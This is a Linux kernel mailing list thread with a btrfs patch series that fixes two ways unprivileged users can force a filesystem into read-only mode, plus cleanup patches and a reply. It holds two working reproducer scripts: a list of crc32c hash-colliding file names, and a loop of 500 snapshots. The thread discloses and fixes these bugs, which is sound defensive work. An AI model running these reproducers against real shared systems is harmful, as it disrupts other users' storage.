* [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode
@ 2026-02-26 14:33 fdmanana
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
` (6 more replies)
0 siblings, 7 replies; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:33 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
We have a couple scenarios that regular users can exploit to trigger a
transaction abort and turn a filesystem into RO mode, causing some
disruption. The first 2 patches fix these, the remainder are just a few
trivial and cleanups.
Filipe Manana (5):
btrfs: fix transaction abort on file creation due to name hash collision
btrfs: fix transaction abort when snapshotting received subvolumes
btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
btrfs: remove pointless error check in btrfs_check_dir_item_collision()
fs/btrfs/dir-item.c | 4 +---
fs/btrfs/inode.c | 19 +++++++++++++++++++
fs/btrfs/ioctl.c | 2 +-
fs/btrfs/transaction.c | 18 +++++++++++++++++-
fs/btrfs/uuid-tree.c | 5 +----
5 files changed, 39 insertions(+), 9 deletions(-)
--
2.47.2
^ permalink raw reply [flat|nested] 15+ messages in thread
* [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
@ 2026-02-26 14:33 ` fdmanana
2026-02-26 18:55 ` Boris Burkov
2026-02-26 14:33 ` [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes fdmanana
` (5 subsequent siblings)
6 siblings, 1 reply; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:33 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
If we attempt to create several files with names that result in the same
hash, we have to pack them in same dir item and that has a limit inherent
to the leaf size. However if we reach that limit, we trigger a transaction
abort and turns the filesystem into RO mode. This allows for a malicious
user to disrupt a system, without the need to have administration
privileges/capabilities.
Reproducer:
$ cat exploit-hash-collisions.sh
#!/bin/bash
DEV=/dev/sdi
MNT=/mnt/sdi
# Use smallest node size to make the test faster and require less file
# names that result in hash collision.
mkfs.btrfs -f --nodesize 4K $DEV
mount $DEV $MNT
# List of names that result in the same crc32c hash for btrfs.
declare -a names=(
'foobar'
'%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC'
'AQci3EUB%shMsg-N%frgU:02ByLs=IPJU0OpgiWit5nexSyxZDncY6WB:=zKZuk5Zy0DD$Ua78%MelgBuMqaHGyKsJUFf9s=UW80PcJmKctb46KveLSiUtNmqrMiL9-Y0I_l5Fnam04CGIg=8@U:Z'
'CvVqJpJzueKcuA$wqwePfyu7VxuWNN3ho$p0zi2H8QFYK$7YlEqOhhb%:hHgjhIjW5vnqWHKNP4'
'ET:vk@rFU4tsvMB0$C_p=xQHaYZjvoF%-BTc%wkFW8yaDAPcCYoR%x$FH5O:'
'HwTon%v7SGSP4FE08jBwwiu5aot2CFKXHTeEAa@38fUcNGOWvE@Mz6WBeDH_VooaZ6AgsXPkVGwy9l@@ZbNXabUU9csiWrrOp0MWUdfi$EZ3w9GkIqtz7I_eOsByOkBOO'
'Ij%2VlFGXSuPvxJGf5UWy6O@1svxGha%b@=%wjkq:CIgE6u7eJOjmQY5qTtxE2Rjbis9@us'
'KBkjG5%9R8K9sOG8UTnAYjxLNAvBmvV5vz3IiZaPmKuLYO03-6asI9lJ_j4@6Xo$KZicaLWJ3Pv8XEwVeUPMwbHYWwbx0pYvNlGMO9F:ZhHAwyctnGy%_eujl%WPd4U2BI7qooOSr85J-C2V$LfY'
'NcRfDfuUQ2=zP8K3CCF5dFcpfiOm6mwenShsAb_F%n6GAGC7fT2JFFn:c35X-3aYwoq7jNX5$ZJ6hI3wnZs$7KgGi7wjulffhHNUxAT0fRRLF39vJ@NvaEMxsMO'
'Oj42AQAEzRoTxa5OuSKIr=A_lwGMy132v4g3Pdq1GvUG9874YseIFQ6QU'
'Ono7avN5GjC:_6dBJ_'
'WHmN2gnmaN-9dVDy4aWo:yNGFzz8qsJyJhWEWcud7$QzN2D9R0efIWWEdu5kwWr73NZm4=@CoCDxrrZnRITr-kGtU_cfW2:%2_am'
'WiFnuTEhAG9FEC6zopQmj-A-$LDQ0T3WULz%ox3UZAPybSV6v1Z$b4L_XBi4M4BMBtJZpz93r9xafpB77r:lbwvitWRyo$odnAUYlYMmU4RvgnNd--e=I5hiEjGLETTtaScWlQp8mYsBovZwM2k'
'XKyH=OsOAF3p%uziGF_ZVr$ivrvhVgD@1u%5RtrV-gl_vqAwHkK@x7YwlxX3qT6WKKQ%PR56NrUBU2dOAOAdzr2=5nJuKPM-T-$ZpQfCL7phxQbUcb:BZOTPaFExc-qK-gDRCDW2'
'd3uUR6OFEwZr%ns1XH_@tbxA@cCPmbBRLdyh7p6V45H$P2$F%w0RqrD3M0g8aGvWpoTFMiBdOTJXjD:JF7=h9a_43xBywYAP%r$SPZi%zDg%ql-KvkdUCtF9OLaQlxmd'
'ePTpbnit%hyNm@WELlpKzNZYOzOTf8EQ$sEfkMy1VOfIUu3coyvIr13-Y7Sv5v-Ivax2Go_GQRFMU1b3362nktT9WOJf3SpT%z8sZmM3gvYQBDgmKI%%RM-G7hyrhgYflOw%z::ZRcv5O:lDCFm'
'evqk743Y@dvZAiG5J05L_ROFV@$2%rVWJ2%3nxV72-W7$e$-SK3tuSHA2mBt$qloC5jwNx33GmQUjD%akhBPu=VJ5g$xhlZiaFtTrjeeM5x7dt4cHpX0cZkmfImndYzGmvwQG:$euFYmXn$_2rA9mKZ'
'gkgUtnihWXsZQTEkrMAWIxir09k3t7jk_IK25t1:cy1XWN0GGqC%FrySdcmU7M8MuPO_ppkLw3=Dfr0UuBAL4%GFk2$Ma10V1jDRGJje%Xx9EV2ERaWKtjpwiZwh0gCSJsj5UL7CR8RtW5opCVFKGGy8Cky'
'hNgsG_8lNRik3PvphqPm0yEH3P%%fYG:kQLY=6O-61Wa6nrV_WVGR6TLB09vHOv%g4VQRP8Gzx7VXUY1qvZyS'
'isA7JVzN12xCxVPJZ_qoLm-pTBuhjjHMvV7o=F:EaClfYNyFGlsfw-Kf%uxdqW-kwk1sPl2vhbjyHU1A6$hz'
'kiJ_fgcdZFDiOptjgH5PN9-PSyLO4fbk_:u5_2tz35lV_iXiJ6cx7pwjTtKy-XGaQ5IefmpJ4N_ZqGsqCsKuqOOBgf9LkUdffHet@Wu'
'lvwtxyhE9:%Q3UxeHiViUyNzJsy:fm38pg_b6s25JvdhOAT=1s0$pG25x=LZ2rlHTszj=gN6M4zHZYr_qrB49i=pA--@WqWLIuX7o1S_SfS@2FSiUZN'
'rC24cw3UBDZ=5qJBUMs9e$=S4Y94ni%Z8639vnrGp=0Hv4z3dNFL0fBLmQ40=EYIY:Z=SLc@QLMSt2zsss2ZXrP7j4='
'uwGl2s-fFrf@GqS=DQqq2I0LJSsOmM%xzTjS:lzXguE3wChdMoHYtLRKPvfaPOZF2fER@j53evbKa7R%A7r4%YEkD=kicJe@SFiGtXHbKe4gCgPAYbnVn'
'UG37U6KKua2bgc:IHzRs7BnB6FD:2Mt5Cc5NdlsW%$1tyvnfz7S27FvNkroXwAW:mBZLA1@qa9WnDbHCDmQmfPMC9z-Eq6QT0jhhPpqyymaD:R02ghwYo%yx7SAaaq-:x33LYpei$5g8DMl3C'
'y2vjek0FE1PDJC0qpfnN:x8k2wCFZ9xiUF2ege=JnP98R%wxjKkdfEiLWvQzmnW'
'8-HCSgH5B%K7P8_jaVtQhBXpBk:pE-$P7ts58U0J@iR9YZntMPl7j$s62yAJO@_9eanFPS54b=UTw$94C-t=HLxT8n6o9P=QnIxq-f1=Ne2dvhe6WbjEQtc'
'YPPh:IFt2mtR6XWSmjHptXL_hbSYu8bMw-JP8@PNyaFkdNFsk$M=xfL6LDKCDM-mSyGA_2MBwZ8Dr4=R1D%7-mCaaKGxb990jzaagRktDTyp'
'9hD2ApKa_t_7x-a@GCG28kY:7$M@5udI1myQ$x5udtggvagmCQcq9QXWRC5hoB0o-_zHQUqZI5rMcz_kbMgvN5jr63LeYA4Cj-c6F5Ugmx6DgVf@2Jqm%MafecpgooqreJ53P-QTS'
)
# Now create files with all those names in the same parent directory.
# It should not fail since a 4K leaf has enough space for them.
for name in "${names[@]}"; do
touch $MNT/$name
done
# Now add one more file name that causes a crc32c hash collision.
# This should fail, but it should not turn the filesystem into RO mode
# (which could be exploited by malicious users) due to a transaction
# abort.
touch $MNT/'W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt'
# Check that we are able to create another file, with a name that does not cause
# a crc32c hash collision.
echo -n "hello world" > $MNT/baz
# Unmount and mount again, verify file baz exists and with the right content.
umount $MNT
mount $DEV $MNT
echo "File baz content: $(cat $MNT/baz)"
umount $MNT
When running the reproducer:
$ ./exploit-hash-collisions.sh
(...)
touch: cannot touch '/mnt/sdi/W6tIm-VK2@BGC@IBfcgg6j_p:pxp_QUqtWpGD5Ok_GmijKOJJt': Value too large for defined data type
./exploit-hash-collisions.sh: line 57: /mnt/sdi/baz: Read-only file system
cat: /mnt/sdi/baz: No such file or directory
File baz content:
And the transaction abort stack trace in dmesg/syslog:
$ dmesg
(...)
[758240.509761] ------------[ cut here ]------------
[758240.510668] BTRFS: Transaction aborted (error -75)
[758240.511577] WARNING: fs/btrfs/inode.c:6854 at btrfs_create_new_inode+0x805/0xb50 [btrfs], CPU#6: touch/888644
[758240.513513] Modules linked in: btrfs dm_zero (...)
[758240.523221] CPU: 6 UID: 0 PID: 888644 Comm: touch Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
[758240.524621] Tainted: [W]=WARN
[758240.525037] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
[758240.526331] RIP: 0010:btrfs_create_new_inode+0x80b/0xb50 [btrfs]
[758240.527093] Code: 0f 82 cf (...)
[758240.529211] RSP: 0018:ffffce64418fbb48 EFLAGS: 00010292
[758240.529935] RAX: 00000000ffffffd3 RBX: 0000000000000000 RCX: 00000000ffffffb5
[758240.531040] RDX: 0000000d04f33e06 RSI: 00000000ffffffb5 RDI: ffffffffc0919dd0
[758240.531920] RBP: ffffce64418fbc10 R08: 0000000000000000 R09: 00000000ffffffb5
[758240.532928] R10: 0000000000000000 R11: ffff8e52c0000000 R12: ffff8e53eee7d0f0
[758240.533818] R13: ffff8e57f70932a0 R14: ffff8e5417629568 R15: 0000000000000000
[758240.534664] FS: 00007f1959a2a740(0000) GS:ffff8e5b27cae000(0000) knlGS:0000000000000000
[758240.535821] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[758240.536644] CR2: 00007f1959b10ce0 CR3: 000000012a2cc005 CR4: 0000000000370ef0
[758240.537517] Call Trace:
[758240.537828] <TASK>
[758240.538099] btrfs_create_common+0xbf/0x140 [btrfs]
[758240.538760] path_openat+0x111a/0x15b0
[758240.539252] do_filp_open+0xc2/0x170
[758240.539699] ? preempt_count_add+0x47/0xa0
[758240.540200] ? __virt_addr_valid+0xe4/0x1a0
[758240.540800] ? __check_object_size+0x1b3/0x230
[758240.541661] ? alloc_fd+0x118/0x180
[758240.542315] do_sys_openat2+0x70/0xd0
[758240.543012] __x64_sys_openat+0x50/0xa0
[758240.543723] do_syscall_64+0x50/0xf20
[758240.544462] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[758240.545397] RIP: 0033:0x7f1959abc687
[758240.546019] Code: 48 89 fa (...)
[758240.548522] RSP: 002b:00007ffe16ff8690 EFLAGS: 00000202 ORIG_RAX: 0000000000000101
[758240.566278] RAX: ffffffffffffffda RBX: 00007f1959a2a740 RCX: 00007f1959abc687
[758240.567068] RDX: 0000000000000941 RSI: 00007ffe16ffa333 RDI: ffffffffffffff9c
[758240.567860] RBP: 0000000000000000 R08: 0000000000000000 R09: 0000000000000000
[758240.568707] R10: 00000000000001b6 R11: 0000000000000202 R12: 0000561eec7c4b90
[758240.569712] R13: 0000561eec7c311f R14: 00007ffe16ffa333 R15: 0000000000000000
[758240.570758] </TASK>
[758240.571040] ---[ end trace 0000000000000000 ]---
[758240.571681] BTRFS: error (device sdi state A) in btrfs_create_new_inode:6854: errno=-75 unknown
[758240.572899] BTRFS info (device sdi state EA): forced readonly
Fix this by checking for hash collision, and if the adding a new name is
possible, early in btrfs_create_new_inode() before we do any tree updates,
so that we don't need to abort the transaction if we can not add the new
name due to the leaf size limit.
A test case for fstests will be sent soon.
Fixes: caae78e03234 ("btrfs: move common inode creation code into btrfs_create_new_inode()")
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/inode.c | 19 +++++++++++++++++++
1 file changed, 19 insertions(+)
diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
index b9f1bd18ea62..9a26fc5a5263 100644
--- a/fs/btrfs/inode.c
+++ b/fs/btrfs/inode.c
@@ -6635,6 +6635,25 @@ int btrfs_create_new_inode(struct btrfs_trans_handle *trans,
int ret;
bool xa_reserved = false;
+ if (!args->orphan && !args->subvol) {
+ /*
+ * Before anything else, check if we can add the name to the
+ * parent directory. We want to avoid a dir item overflow in
+ * case we have an existing dir item due to existing name
+ * hash collisions. We do this check here before we call
+ * btrfs_add_link() down below so that we can avoid a
+ * transaction abort (which could be exploited by malicious
+ * users).
+ *
+ * For subvolumes we already do this in btrfs_mksubvol().
+ */
+ ret = btrfs_check_dir_item_collision(BTRFS_I(dir)->root,
+ btrfs_ino(BTRFS_I(dir)),
+ name);
+ if (ret < 0)
+ return ret;
+ }
+
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
--
2.47.2
^ permalink raw reply related [flat|nested] 15+ messages in thread
* [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
@ 2026-02-26 14:33 ` fdmanana
2026-02-26 20:40 ` Qu Wenruo
2026-02-26 14:34 ` [PATCH 3/5] btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add() fdmanana
` (4 subsequent siblings)
6 siblings, 1 reply; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:33 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
Currently a user can trigger a transaction abort by snapshotting a
previously received snapshot a bunch of times until we reach a
BTRFS_UUID_KEY_RECEIVED_SUBVOL item overflow (the maximum item size we
can store in a leaf). This is very likely not common in practice, but
if it happens, it turns the filesystem into RO mode. The snapshot, send
and set_received_subvol and subvol_setflags (used by receive) don't
require CAP_SYS_ADMIN, just inode_owner_or_capable(). A malicious user
could use this to turn a filesystem into RO mode and disrupt a system.
Reproducer script:
$ cat test.sh
#!/bin/bash
DEV=/dev/sdi
MNT=/mnt/sdi
# Use smallest node size to make the test faster.
mkfs.btrfs -f --nodesize 4K $DEV
mount $DEV $MNT
# Create a subvolume and set it to RO so that it can be used for send.
btrfs subvolume create $MNT/sv
touch $MNT/sv/foo
btrfs property set $MNT/sv ro true
# Send and receive the subvolume into snaps/sv.
mkdir $MNT/snaps
btrfs send $MNT/sv | btrfs receive $MNT/snaps
# Now snapshot the received subvolume, which has a received_uuid, a
# lot of times to trigger the leaf overflow.
total=500
for ((i = 1; i <= $total; i++)); do
echo -ne "\rCreating snapshot $i/$total"
btrfs subvolume snapshot -r $MNT/snaps/sv $MNT/snaps/sv_$i > /dev/null
done
echo
umount $MNT
When running the test:
$ ./test.sh
(...)
Create subvolume '/mnt/sdi/sv'
At subvol /mnt/sdi/sv
At subvol sv
Creating snapshot 496/500ERROR: Could not create subvolume: Value too large for defined data type
Creating snapshot 497/500ERROR: Could not create subvolume: Read-only file system
Creating snapshot 498/500ERROR: Could not create subvolume: Read-only file system
Creating snapshot 499/500ERROR: Could not create subvolume: Read-only file system
Creating snapshot 500/500ERROR: Could not create subvolume: Read-only file system
And in dmesg/syslog:
$ dmesg
(...)
[251067.627338] BTRFS warning (device sdi): insert uuid item failed -75 (0x4628b21c4ac8d898, 0x2598bee2b1515c91) type 252!
[251067.629212] ------------[ cut here ]------------
[251067.630033] BTRFS: Transaction aborted (error -75)
[251067.630871] WARNING: fs/btrfs/transaction.c:1907 at create_pending_snapshot.cold+0x52/0x465 [btrfs], CPU#10: btrfs/615235
[251067.632851] Modules linked in: btrfs dm_zero (...)
[251067.644071] CPU: 10 UID: 0 PID: 615235 Comm: btrfs Tainted: G W 6.19.0-rc8-btrfs-next-225+ #1 PREEMPT(full)
[251067.646165] Tainted: [W]=WARN
[251067.646733] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014
[251067.648735] RIP: 0010:create_pending_snapshot.cold+0x55/0x465 [btrfs]
[251067.649984] Code: f0 48 0f (...)
[251067.653313] RSP: 0018:ffffce644908fae8 EFLAGS: 00010292
[251067.653987] RAX: 00000000ffffff01 RBX: ffff8e5639e63a80 RCX: 00000000ffffffd3
[251067.655042] RDX: ffff8e53faa76b00 RSI: 00000000ffffffb5 RDI: ffffffffc0919750
[251067.656077] RBP: ffffce644908fbd8 R08: 0000000000000000 R09: ffffce644908f820
[251067.657068] R10: ffff8e5adc1fffa8 R11: 0000000000000003 R12: ffff8e53c0431bd0
[251067.658050] R13: ffff8e5414593600 R14: ffff8e55efafd000 R15: 00000000ffffffb5
[251067.659019] FS: 00007f2a4944b3c0(0000) GS:ffff8e5b27dae000(0000) knlGS:0000000000000000
[251067.660115] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[251067.660943] CR2: 00007ffc5aa57898 CR3: 00000005813a2003 CR4: 0000000000370ef0
[251067.661972] Call Trace:
[251067.662292] <TASK>
[251067.662653] create_pending_snapshots+0x97/0xc0 [btrfs]
[251067.663413] btrfs_commit_transaction+0x26e/0xc00 [btrfs]
[251067.664257] ? btrfs_qgroup_convert_reserved_meta+0x35/0x390 [btrfs]
[251067.665238] ? _raw_spin_unlock+0x15/0x30
[251067.665837] ? record_root_in_trans+0xa2/0xd0 [btrfs]
[251067.666531] btrfs_mksubvol+0x330/0x580 [btrfs]
[251067.667145] btrfs_mksnapshot+0x74/0xa0 [btrfs]
[251067.667827] __btrfs_ioctl_snap_create+0x194/0x1d0 [btrfs]
[251067.668595] btrfs_ioctl_snap_create_v2+0x107/0x130 [btrfs]
[251067.669479] btrfs_ioctl+0x1580/0x2690 [btrfs]
[251067.670093] ? count_memcg_events+0x6d/0x180
[251067.670849] ? handle_mm_fault+0x1a0/0x2a0
[251067.671652] __x64_sys_ioctl+0x92/0xe0
[251067.672406] do_syscall_64+0x50/0xf20
[251067.673129] entry_SYSCALL_64_after_hwframe+0x76/0x7e
[251067.674096] RIP: 0033:0x7f2a495648db
[251067.674812] Code: 00 48 89 (...)
[251067.678227] RSP: 002b:00007ffc5aa57840 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[251067.679691] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f2a495648db
[251067.681145] RDX: 00007ffc5aa588b0 RSI: 0000000050009417 RDI: 0000000000000004
[251067.682511] RBP: 0000000000000002 R08: 0000000000000000 R09: 0000000000000000
[251067.683842] R10: 000000000000000a R11: 0000000000000246 R12: 00007ffc5aa59910
[251067.685176] R13: 00007ffc5aa588b0 R14: 0000000000000004 R15: 0000000000000006
[251067.686524] </TASK>
[251067.686972] ---[ end trace 0000000000000000 ]---
[251067.687890] BTRFS: error (device sdi state A) in create_pending_snapshot:1907: errno=-75 unknown
[251067.689049] BTRFS info (device sdi state EA): forced readonly
[251067.689054] BTRFS warning (device sdi state EA): Skipping commit of aborted transaction.
[251067.690119] BTRFS: error (device sdi state EA) in cleanup_transaction:2043: errno=-75 unknown
[251067.702028] BTRFS info (device sdi state EA): last unmount of filesystem 46dc3975-30a2-4a69-a18f-418b859cccda
Fix this by ignoring -EOVERFLOW errors from btrfs_uuid_tree_add() in the
snapshot creation code when attempting to add the
BTRFS_UUID_KEY_RECEIVED_SUBVOL item. This is ok because it's not critical
and we are still able to delete the snapshot, as snapshot/subvolume
deletion ignores if a BTRFS_UUID_KEY_RECEIVED_SUBVOL is missing (see
inode.c:btrfs_delete_subvolume()). As for send/receive, we can still do
send/receive operations since it always peeks the first root ID in the
existing BTRFS_UUID_KEY_RECEIVED_SUBVOL (it could peek any since all
snapshots have the same content), and even if the key is missing, it
fallsback to searching by BTRFS_UUID_KEY_SUBVOL key.
A test case for fstests will be sent soon.
Fixes: dd5f9615fc5c ("Btrfs: maintain subvolume items in the UUID tree")
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/transaction.c | 16 ++++++++++++++++
1 file changed, 16 insertions(+)
diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
index 3112bd5520b7..1a0daf2c68fb 100644
--- a/fs/btrfs/transaction.c
+++ b/fs/btrfs/transaction.c
@@ -1902,6 +1902,22 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
ret = btrfs_uuid_tree_add(trans, new_root_item->received_uuid,
BTRFS_UUID_KEY_RECEIVED_SUBVOL,
objectid);
+ /*
+ * We are creating of lot of snapshots of the same root that was
+ * received (has a received UUID) and reached a leaf's limit for
+ * an item. We can safefly ignore this and avoid a transaction
+ * abort. A deletion of this snapshot will still work since we
+ * ignore if an item with a BTRFS_UUID_KEY_RECEIVED_SUBVOL key
+ * is missing (see btrfs_delete_subvolume()). Send/receive will
+ * work too since it peeks the first root id from the existing
+ * item (it could peek any), and in case it's missing it
+ * falls back to search by BTRFS_UUID_KEY_SUBVOL keys.
+ * Creation of a snapshot does not require CAP_SYS_ADMIN, so
+ * we don't want users triggering transaction aborts, either
+ * intentionally or not.
+ */
+ if (ret == -EOVERFLOW)
+ ret = 0;
if (unlikely(ret && ret != -EEXIST)) {
btrfs_abort_transaction(trans, ret);
goto fail;
--
2.47.2
^ permalink raw reply related [flat|nested] 15+ messages in thread
* [PATCH 3/5] btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add()
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
2026-02-26 14:33 ` [PATCH 2/5] btrfs: fix transaction abort when snapshotting received subvolumes fdmanana
@ 2026-02-26 14:34 ` fdmanana
2026-02-26 14:34 ` [PATCH 4/5] btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add() fdmanana
` (3 subsequent siblings)
6 siblings, 0 replies; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:34 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
We never return -EEXIST from btrfs_uuid_tree_add(), if the item already
exists we extend it, so it's pointless to check for such return value.
Furthermore, in create_pending_snapshot(), the logic is completely broken.
The goal was to not error out and abort the transaction in case of -EEXIST
but we left 'ret' with the -EEXIST value, so we end up setting
pending->error to -EEXIST and return that error up the call chain up to
btrfs_commit_transaction(), which will abort the transaction.
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/ioctl.c | 2 +-
fs/btrfs/transaction.c | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
index b8db877be61c..e5cff9c0616d 100644
--- a/fs/btrfs/ioctl.c
+++ b/fs/btrfs/ioctl.c
@@ -3974,7 +3974,7 @@ static long _btrfs_ioctl_set_received_subvol(struct file *file,
ret = btrfs_uuid_tree_add(trans, sa->uuid,
BTRFS_UUID_KEY_RECEIVED_SUBVOL,
btrfs_root_id(root));
- if (unlikely(ret < 0 && ret != -EEXIST)) {
+ if (unlikely(ret < 0)) {
btrfs_abort_transaction(trans, ret);
btrfs_end_transaction(trans);
goto out;
diff --git a/fs/btrfs/transaction.c b/fs/btrfs/transaction.c
index 1a0daf2c68fb..c6a2328b6a22 100644
--- a/fs/btrfs/transaction.c
+++ b/fs/btrfs/transaction.c
@@ -1918,7 +1918,7 @@ static noinline int create_pending_snapshot(struct btrfs_trans_handle *trans,
*/
if (ret == -EOVERFLOW)
ret = 0;
- if (unlikely(ret && ret != -EEXIST)) {
+ if (unlikely(ret)) {
btrfs_abort_transaction(trans, ret);
goto fail;
}
--
2.47.2
^ permalink raw reply related [flat|nested] 15+ messages in thread
* [PATCH 4/5] btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add()
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
` (2 preceding siblings ...)
2026-02-26 14:34 ` [PATCH 3/5] btrfs: stop checking for -EEXIST return value from btrfs_uuid_tree_add() fdmanana
@ 2026-02-26 14:34 ` fdmanana
2026-02-26 14:34 ` [PATCH 5/5] btrfs: remove pointless error check in btrfs_check_dir_item_collision() fdmanana
` (2 subsequent siblings)
6 siblings, 0 replies; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:34 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
There's no point in checking if the uuid root exists in
btrfs_uuid_tree_add(), since we already do it in btrfs_uuid_tree_lookup().
We can just remove the check from btrfs_uuid_tree_add() and make
btrfs_uuid_tree_lookup() return -EINVAL instead of -ENOENT in case the
uuid tree does not exists.
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/uuid-tree.c | 5 +----
1 file changed, 1 insertion(+), 4 deletions(-)
diff --git a/fs/btrfs/uuid-tree.c b/fs/btrfs/uuid-tree.c
index f24c14b9bb2f..7942d3887515 100644
--- a/fs/btrfs/uuid-tree.c
+++ b/fs/btrfs/uuid-tree.c
@@ -35,7 +35,7 @@ static int btrfs_uuid_tree_lookup(struct btrfs_root *uuid_root, const u8 *uuid,
struct btrfs_key key;
if (WARN_ON_ONCE(!uuid_root))
- return -ENOENT;
+ return -EINVAL;
path = btrfs_alloc_path();
if (!path)
@@ -92,9 +92,6 @@ int btrfs_uuid_tree_add(struct btrfs_trans_handle *trans, const u8 *uuid, u8 typ
if (ret != -ENOENT)
return ret;
- if (WARN_ON_ONCE(!uuid_root))
- return -EINVAL;
-
btrfs_uuid_to_key(uuid, type, &key);
path = btrfs_alloc_path();
--
2.47.2
^ permalink raw reply related [flat|nested] 15+ messages in thread
* [PATCH 5/5] btrfs: remove pointless error check in btrfs_check_dir_item_collision()
2026-02-26 14:33 [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode fdmanana
` (3 preceding siblings ...)
2026-02-26 14:34 ` [PATCH 4/5] btrfs: remove duplicated uuid tree existence check in btrfs_uuid_tree_add() fdmanana
@ 2026-02-26 14:34 ` fdmanana
2026-02-26 19:10 ` [PATCH 0/5] btrfs: fix exploits that allow malicious users to turn fs into RO mode Boris Burkov
2026-02-26 23:10 ` Qu Wenruo
6 siblings, 0 replies; 15+ messages in thread
From: fdmanana @ 2026-02-26 14:34 UTC (permalink / raw)
To: linux-btrfs
From: Filipe Manana <fdmanana@suse.com>
We're under the IS_ERR() branch so we know that 'ret', which got assigned
the value of PTR_ERR(di) is always negative, so there's no point in
checking if it's negative.
Signed-off-by: Filipe Manana <fdmanana@suse.com>
---
fs/btrfs/dir-item.c | 4 +---
1 file changed, 1 insertion(+), 3 deletions(-)
diff --git a/fs/btrfs/dir-item.c b/fs/btrfs/dir-item.c
index 085a83ae9e62..84f1c64423d3 100644
--- a/fs/btrfs/dir-item.c
+++ b/fs/btrfs/dir-item.c
@@ -253,9 +253,7 @@ int btrfs_check_dir_item_collision(struct btrfs_root *root, u64 dir_ino,
/* Nothing found, we're safe */
if (ret == -ENOENT)
return 0;
-
- if (ret < 0)
- return ret;
+ return ret;
}
/* we found an item, look for our name in the item */
--
2.47.2
^ permalink raw reply related [flat|nested] 15+ messages in thread
* Re: [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision
2026-02-26 14:33 ` [PATCH 1/5] btrfs: fix transaction abort on file creation due to name hash collision fdmanana
@ 2026-02-26 18:55 ` Boris Burkov
2026-02-26 21:24 ` Filipe Manana
0 siblings, 1 reply; 15+ messages in thread
From: Boris Burkov @ 2026-02-26 18:55 UTC (permalink / raw)
To: fdmanana; +Cc: linux-btrfs
On Thu, Feb 26, 2026 at 02:33:58PM +0000, fdmanana@kernel.org wrote:
> From: Filipe Manana <fdmanana@suse.com>
>
> If we attempt to create several files with names that result in the same
> hash, we have to pack them in same dir item and that has a limit inherent
> to the leaf size. However if we reach that limit, we trigger a transaction
> abort and turns the filesystem into RO mode. This allows for a malicious
> user to disrupt a system, without the need to have administration
> privileges/capabilities.
>
> Reproducer:
>
> $ cat exploit-hash-collisions.sh
> #!/bin/bash
>
> DEV=/dev/sdi
> MNT=/mnt/sdi
>
> # Use smallest node size to make the test faster and require less file
> # names that result in hash collision.
> mkfs.btrfs -f --nodesize 4K $DEV
> mount $DEV $MNT
>
> # List of names that result in the same crc32c hash for btrfs.
> declare -a names=(
> 'foobar'
> '%a8tYkxfGMLWRGr55QSeQc4PBNH9PCLIvR6jZnkDtUUru1t@RouaUe_L:@xGkbO3nCwvLNYeK9vhE628gss:T$yZjZ5l-Nbd6CbC$M=hqE-ujhJICXyIxBvYrIU9-TDC'
